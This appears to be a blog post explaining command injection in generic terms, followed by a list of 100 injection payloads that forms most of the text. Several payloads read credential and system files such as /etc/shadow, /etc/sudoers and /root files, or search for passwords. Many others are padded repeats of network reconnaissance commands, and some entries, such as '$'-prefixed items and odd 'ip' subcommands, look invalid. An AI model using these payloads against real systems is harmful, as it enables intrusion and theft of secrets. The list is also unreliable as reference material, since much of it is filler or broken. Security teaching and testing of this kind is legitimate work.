Command Injection

Command Injection

Command injection is an attack in which the goal is to execute system commands on a host machine through a vulnerable application. It is one of the most common web application vulnerabilities and occurs when untrusted data is sent to an interpreter as part of a command or query.

What is Command Injection?

Command injection is a type of attack in which an attacker is able to execute arbitrary system commands on a vulnerable host system. The attacker is able to inject malicious commands into an application, which are then executed on the host. Command injection is one of the most common web application vulnerabilities and can potentially lead to serious consequences such as data leakage, privilege escalation, and system compromise.

2. How Does Command Injection Work?

Command injection attacks occur when an application passes untrusted data to an interpreter as part of a command or query. The attacker injects malicious commands into the application, which are then executed on the host system. This can be done through user input fields, file uploads, and other vulnerable areas of the application.

3. What Are the Effects of Command Injection?

Command injection attacks can have serious consequences ranging from data leakage, privilege escalation, and system compromise. Command injection can also be used to gain access to sensitive data, execute malicious code, and launch denial of service attacks.

4. How Can You Prevent Command Injection?

In order to prevent command injection attacks, it is important to properly validate user input. All user input should be sanitized and filtered to ensure that it does not contain any malicious code. It is also important to limit the privileges of the application so that it cannot execute commands that could potentially be used in an attack. Finally, it is important to perform regular security audits in order to identify any potential vulnerabilities.

How to Find Command injection

The most effective way to find command injection vulnerabilities is to perform a comprehensive security audit of the web application. During the audit, security professionals should look for any areas of the application where user input is accepted and then passed to an interpreter. These areas should be closely examined to ensure that they are properly sanitized and filtered to prevent malicious code from being injected. Additionally, security professionals should look for any areas of the application where privileged commands can be executed. These areas should be closely monitored and any suspicious activity should be investigated.

Parameters To Find Command Injection

When searching for command injection vulnerabilities, it is important to consider the following parameters:

1. User Input: All user input should be carefully examined to ensure that it does not contain any malicious code.

2. Privileged Commands: Security professionals should look for any areas of the application where privileged commands can be executed. Any suspicious activity should be investigated.

3. Authentication: Authentication should be used to ensure that only authorized users are able to access sensitive areas of the application.

4. Logging: Logging should be enabled to monitor all activity on the system and identify any potential attacks.

5. Encryption: Encryption should be used to protect sensitive data and communications.

100 Command Injection Payloads

1. ;cat /etc/passwd
2. & whoami
3. | wc -l
4. && ls -al
5. $ ls -lah
6. ; ls -al
7. | grep -i password
8. & find / -type f -name “*.conf”
9. | find / -name “*.txt”
10. && find / -type f -name “*.log”
11. $ sort /etc/passwd
12. ; sort /etc/shadow
13. & cat /proc/version
14. | cat /etc/issue
15. && cat /etc/hosts
16. $ cat /etc/resolv.conf
17. ; echo “test”
18. & echo “test” > /tmp/test.txt
19. | ps aux
20. && ps -ef
21. $ netstat -anp
22. ; netstat -tulpn
23. & who
24. | whoami
25. && env
26. $ env | grep -i path
27. ; cat /etc/services
28. & cat /etc/group
29. | cat /root/.bashrc
30. && cat /root/.profile
31. $ cat /etc/sudoers
32. ; ls -alh /etc/ssh
33. & ls -alh /root
34. | ls -alh /home
35. && ls -alh /var/log
36. $ cat /proc/cpuinfo
37. ; cat /proc/meminfo
38. & cat /proc/loadavg
39. | cat /proc/stat
40. && cat /proc/net/dev
41. $ cat /proc/net/arp
42. ; cat /proc/net/route
43. & cat /proc/net/ip_mr_cache
44. | cat /proc/net/ip_conntrack
45. && cat /proc/net/ipv6_route
46. $ cat /proc/net/ipv6_mr_cache
47. ; cat /proc/net/ipv6_conntrack
48. & cat /proc/net/icmp
49. | cat /proc/net/igmp
50. && cat /proc/net/raw
51. $ cat /proc/net/raw6
52. ; cat /proc/net/udp
53. & cat /proc/net/udp6
54. | cat /proc/net/tcp
55. && cat /proc/net/tcp6
56. $ cat /proc/sys/net/ipv4/ip_forward
57. ; cat /proc/sys/net/ipv4/conf/all/rp_filter
58. & cat /proc/sys/net/ipv4/icmp_echo_ignore_all
59. | cat /proc/sys/net/ipv6/conf/all/disable_ipv6
60. && cat /proc/sys/net/ipv6/conf/default/disable_ipv6
61. $ cat /proc/sys/net/ipv4/conf/default/accept_redirects
62. ; cat /proc/sys/net/ipv4/conf/all/accept_source_route
63. & cat /proc/sys/net/ipv6/conf/default/accept_redirects
64. | cat /proc/sys/net/ipv6/conf/all/accept_source_route
65. && ip route show
66. $ ip route show table all
67. ; ip route show table local
68. & ip route show table main
69. | ip route show table default
70. && ip rule show
71. $ ip -6 rule show
72. ; ip -6 route show table main
73. & ip -6 route show table local
74. | ip -6 route show table default
75. && ip -s link
76. $ ip -s addr
77. ; ip -s route
78. & ip -s neigh
79. | ip -s rule
80. && ip -s maddr
81. $ ip -s mroute
82. ; ip -s mrule
83. & ip -6 tunnel show
84. | ip -6 tunnel show table
85. && ip -6 tunnel show table main
86. $ ip -6 tunnel show table local
87. ; ip -6 tunnel show table default
88. & ip -6 tunnel show table all
89. | ip link show
90. && ip addr show
91. $ ip route show
92. ; ip route show table
93. & ip neigh show
94. | ip rule show
95. && ip maddr show
96. $ ip mroute show
97. ; ip mrule show
98. & ip -s link show
99. | ip -s addr show
100. && ip -s route show

Tags: , , , , , ,

Leave a Reply